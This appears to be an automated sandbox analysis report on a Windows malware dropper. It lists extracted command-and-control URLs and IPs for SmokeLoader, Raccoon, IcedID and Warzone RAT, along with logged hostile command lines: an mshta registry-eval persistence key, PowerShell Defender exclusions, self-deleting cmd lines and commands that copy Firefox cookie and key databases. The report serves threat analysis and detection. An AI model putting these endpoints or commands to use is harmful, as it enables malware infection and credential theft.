Analysis
-
max time kernel
151s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
14-12-2021 20:02
Static task
static1
Behavioral task
behavioral1
Sample
d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe
Resource
win10-en-20211208
General
-
Target
d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe
-
Size
321KB
-
MD5
0916cd1bda3c4fc326d6413a87a17e2e
-
SHA1
b6c6373355815368757a0d962355336ef01e4ca6
-
SHA256
d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb
-
SHA512
bfca65c2c26377c5f891c0387d03d801c0ec7ec25fb56cc4291307414d9c84397fffdbc906dbd4159efa729410334fac1b3884538c6483fea319c09483ec5e2b
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
icedid
3372020928
jeliskvosh.com
Extracted
raccoon
871b18794e3cbbc6476a5b391363702168853a50
-
url4cnc
http://194.180.174.53/duglassa1
http://91.219.236.18/duglassa1
http://194.180.174.41/duglassa1
http://91.219.236.148/duglassa1
https://t.me/duglassa1
Extracted
warzonerat
91.229.76.26:5200
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral1/memory/3632-134-0x0000000000880000-0x00000000008E9000-memory.dmp family_redline behavioral1/memory/1904-164-0x0000000000C30000-0x0000000000CD6000-memory.dmp family_redline behavioral1/memory/964-238-0x0000000000220000-0x00000000002A6000-memory.dmp family_redline behavioral1/memory/2420-258-0x000000000041BDCE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 1500 created 396 1500 WerFault.exe 74 -
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 3 IoCs
resource yara_rule behavioral1/memory/1792-185-0x00000000003D0000-0x00000000003DF000-memory.dmp family_vkeylogger behavioral1/memory/1792-191-0x00000000003D3500-mapping.dmp family_vkeylogger behavioral1/memory/3000-205-0x00000000001E0000-0x00000000001EF000-memory.dmp family_vkeylogger -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Arkei Stealer Payload 3 IoCs
resource yara_rule behavioral1/memory/2312-204-0x0000000000400000-0x00000000004D3000-memory.dmp family_arkei behavioral1/memory/3172-294-0x0000000000540000-0x00000000005EE000-memory.dmp family_arkei behavioral1/memory/3172-295-0x0000000000400000-0x00000000004D3000-memory.dmp family_arkei -
Warzone RAT Payload 2 IoCs
resource yara_rule behavioral1/memory/1320-308-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral1/memory/1740-458-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 4060 FF31.exe 3048 10C6.exe 3316 FF31.exe 3632 1CBD.exe 3660 28E5.exe 1904 2D7A.exe 2312 3913.exe 4024 40A6.exe 2004 411.exe 992 A963.exe 964 B02B.exe 2404 BA9C.exe 3172 C2AB.exe 3808 C52D.exe 1320 C8C8.exe 2452 Doni.exe.com 1944 Doni.exe.com 1740 Reader.exe 3452 EF0D.exe -
Deletes itself 1 IoCs
pid Process 2892 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dMOSAsvegV.url Doni.exe.com -
Loads dropped DLL 7 IoCs
pid Process 396 regsvr32.exe 2312 3913.exe 2312 3913.exe 2312 3913.exe 3172 C2AB.exe 3172 C2AB.exe 3172 C2AB.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 411.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 411.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 411.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeDriver = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Firefox_update = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);" explorer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C52D.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C52D.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Adobe Reader = "C:\\ProgramData\\Reader.exe" C8C8.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 90 ifconfig.me 98 freegeoip.app 99 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3632 1CBD.exe 1904 2D7A.exe 964 B02B.exe 3452 EF0D.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2756 set thread context of 756 2756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 69 PID 4060 set thread context of 3316 4060 FF31.exe 72 PID 3660 set thread context of 1792 3660 28E5.exe 80 PID 1792 set thread context of 3000 1792 RegSvcs.exe 82 PID 992 set thread context of 2420 992 A963.exe 94 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1500 396 WerFault.exe 74 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 40A6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FF31.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FF31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10C6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 40A6.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 40A6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FF31.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10C6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10C6.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C2AB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C2AB.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 411.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 411.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3913.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3913.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4072 timeout.exe 3972 timeout.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 68 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2892 Process not Found -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 3316 FF31.exe 3048 10C6.exe 1792 RegSvcs.exe 3000 explorer.exe 4024 40A6.exe 2892 Process not Found 2892 Process not Found 2892 Process not Found 2892 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeDebugPrivilege 1500 WerFault.exe Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeDebugPrivilege 1904 2D7A.exe Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeDebugPrivilege 2004 411.exe Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeDebugPrivilege 2420 RegAsm.exe Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found Token: SeShutdownPrivilege 2892 Process not Found Token: SeCreatePagefilePrivilege 2892 Process not Found -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 3000 explorer.exe 2452 Doni.exe.com 2892 Process not Found 2892 Process not Found 2452 Doni.exe.com 2452 Doni.exe.com 2892 Process not Found 2892 Process not Found 1944 Doni.exe.com 2892 Process not Found 2892 Process not Found 1944 Doni.exe.com 1944 Doni.exe.com 2892 Process not Found 2892 Process not Found -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2452 Doni.exe.com 2452 Doni.exe.com 2452 Doni.exe.com 1944 Doni.exe.com 1944 Doni.exe.com 1944 Doni.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2756 wrote to memory of 756 2756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 69 PID 2756 wrote to memory of 756 2756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 69 PID 2756 wrote to memory of 756 2756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 69 PID 2756 wrote to memory of 756 2756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 69 PID 2756 wrote to memory of 756 2756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 69 PID 2756 wrote to memory of 756 2756 d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe 69 PID 2892 wrote to memory of 4060 2892 Process not Found 70 PID 2892 wrote to memory of 4060 2892 Process not Found 70 PID 2892 wrote to memory of 4060 2892 Process not Found 70 PID 2892 wrote to memory of 3048 2892 Process not Found 71 PID 2892 wrote to memory of 3048 2892 Process not Found 71 PID 2892 wrote to memory of 3048 2892 Process not Found 71 PID 4060 wrote to memory of 3316 4060 FF31.exe 72 PID 4060 wrote to memory of 3316 4060 FF31.exe 72 PID 4060 wrote to memory of 3316 4060 FF31.exe 72 PID 4060 wrote to memory of 3316 4060 FF31.exe 72 PID 4060 wrote to memory of 3316 4060 FF31.exe 72 PID 4060 wrote to memory of 3316 4060 FF31.exe 72 PID 2892 wrote to memory of 3632 2892 Process not Found 73 PID 2892 wrote to memory of 3632 2892 Process not Found 73 PID 2892 wrote to memory of 3632 2892 Process not Found 73 PID 2892 wrote to memory of 396 2892 Process not Found 74 PID 2892 wrote to memory of 396 2892 Process not Found 74 PID 2892 wrote to memory of 3660 2892 Process not Found 75 PID 2892 wrote to memory of 3660 2892 Process not Found 75 PID 2892 wrote to memory of 3660 2892 Process not Found 75 PID 2892 wrote to memory of 1904 2892 Process not Found 76 PID 2892 wrote to memory of 1904 2892 Process not Found 76 PID 2892 wrote to memory of 1904 2892 Process not Found 76 PID 2892 wrote to memory of 2312 2892 Process not Found 79 PID 2892 wrote to memory of 2312 2892 Process not Found 79 PID 2892 wrote to memory of 2312 2892 Process not Found 79 PID 3660 wrote to memory of 1792 3660 28E5.exe 80 PID 3660 wrote to memory of 1792 3660 28E5.exe 80 PID 3660 wrote to memory of 1792 3660 28E5.exe 80 PID 3660 wrote to memory of 1792 3660 28E5.exe 80 PID 3660 wrote to memory of 1792 3660 28E5.exe 80 PID 2892 wrote to memory of 4024 2892 Process not Found 81 PID 2892 wrote to memory of 4024 2892 Process not Found 81 PID 2892 wrote to memory of 4024 2892 Process not Found 81 PID 1792 wrote to memory of 3000 1792 RegSvcs.exe 82 PID 1792 wrote to memory of 3000 1792 RegSvcs.exe 82 PID 1792 wrote to memory of 3000 1792 RegSvcs.exe 82 PID 3000 wrote to memory of 2004 3000 explorer.exe 84 PID 3000 wrote to memory of 2004 3000 explorer.exe 84 PID 2004 wrote to memory of 1936 2004 411.exe 86 PID 2004 wrote to memory of 1936 2004 411.exe 86 PID 1936 wrote to memory of 4060 1936 cmd.exe 88 PID 1936 wrote to memory of 4060 1936 cmd.exe 88 PID 2312 wrote to memory of 1204 2312 3913.exe 89 PID 2312 wrote to memory of 1204 2312 3913.exe 89 PID 2312 wrote to memory of 1204 2312 3913.exe 89 PID 2892 wrote to memory of 992 2892 Process not Found 90 PID 2892 wrote to memory of 992 2892 Process not Found 90 PID 1204 wrote to memory of 4072 1204 cmd.exe 92 PID 1204 wrote to memory of 4072 1204 cmd.exe 92 PID 1204 wrote to memory of 4072 1204 cmd.exe 92 PID 2892 wrote to memory of 964 2892 Process not Found 93 PID 2892 wrote to memory of 964 2892 Process not Found 93 PID 2892 wrote to memory of 964 2892 Process not Found 93 PID 992 wrote to memory of 2420 992 A963.exe 94 PID 992 wrote to memory of 2420 992 A963.exe 94 PID 992 wrote to memory of 2420 992 A963.exe 94 PID 992 wrote to memory of 2420 992 A963.exe 94 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe"C:\Users\Admin\AppData\Local\Temp\d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe"C:\Users\Admin\AppData\Local\Temp\d07732245b39a512bf67abe23033b6119872aa8f98398595709f7a69f486bbbb.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:756
-
-
C:\Users\Admin\AppData\Local\Temp\FF31.exeC:\Users\Admin\AppData\Local\Temp\FF31.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\FF31.exeC:\Users\Admin\AppData\Local\Temp\FF31.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\10C6.exeC:\Users\Admin\AppData\Local\Temp\10C6.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3048
-
C:\Users\Admin\AppData\Local\Temp\1CBD.exeC:\Users\Admin\AppData\Local\Temp\1CBD.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3632
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\23A4.dll1⤵
- Loads dropped DLL
PID:396 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 396 -s 5002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\28E5.exeC:\Users\Admin\AppData\Local\Temp\28E5.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"3⤵
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Users\Admin\AppData\Local\Temp\411.exe"C:\Users\Admin\AppData\Local\Temp\411.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\411.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:4060
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2D7A.exeC:\Users\Admin\AppData\Local\Temp\2D7A.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
C:\Users\Admin\AppData\Local\Temp\3913.exeC:\Users\Admin\AppData\Local\Temp\3913.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3913.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\40A6.exeC:\Users\Admin\AppData\Local\Temp\40A6.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4024
-
C:\Users\Admin\AppData\Local\Temp\A963.exeC:\Users\Admin\AppData\Local\Temp\A963.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Users\Admin\AppData\Local\Temp\B02B.exeC:\Users\Admin\AppData\Local\Temp\B02B.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:964
-
C:\Users\Admin\AppData\Local\Temp\BA9C.exeC:\Users\Admin\AppData\Local\Temp\BA9C.exe1⤵
- Executes dropped EXE
PID:2404
-
C:\Users\Admin\AppData\Local\Temp\C2AB.exeC:\Users\Admin\AppData\Local\Temp\C2AB.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3172 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C2AB.exe" & exit2⤵PID:1428
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:3972
-
-
-
C:\Users\Admin\AppData\Local\Temp\C52D.exeC:\Users\Admin\AppData\Local\Temp\C52D.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3808 -
C:\Windows\SysWOW64\extrac32.exeextrac322⤵PID:4044
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Tra.xlsx & ping 127.0.0.1 -n 302⤵PID:2216
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:1764
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^dMFemqVCSwldOigKUiVwItEauGtDewBPrbAynibrquaLXwOyLiwfdszkojVTWsAQmchdHojNJSqBMSxyRZ$" Tenere.xlsx4⤵PID:1308
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Doni.exe.comDoni.exe.com i4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Doni.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Doni.exe.com i5⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1944 -
C:\Windows\SysWOW64\nslookup.exeC:\Windows\SysWOW64\nslookup.exe6⤵PID:1208
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 303⤵
- Runs ping.exe
PID:68
-
-
-
C:\Users\Admin\AppData\Local\Temp\C8C8.exeC:\Users\Admin\AppData\Local\Temp\C8C8.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\2⤵PID:3448
-
-
C:\ProgramData\Reader.exe"C:\ProgramData\Reader.exe"2⤵
- Executes dropped EXE
PID:1740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\3⤵PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\EF0D.exeC:\Users\Admin\AppData\Local\Temp\EF0D.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3452
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3712
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1576
-
C:\Windows\system32\cmd.execmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ceywcwgd.default-release\cookies.sqlite" "C:\Users\Admin\AppData\Local\Temp\\sLmgJQuS.AVQ"1⤵PID:2116
-
C:\Windows\system32\cmd.execmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ceywcwgd.default-release\key4.db" "C:\Users\Admin\AppData\Local\Temp\\TGTEKTDH.Rfn"1⤵PID:3712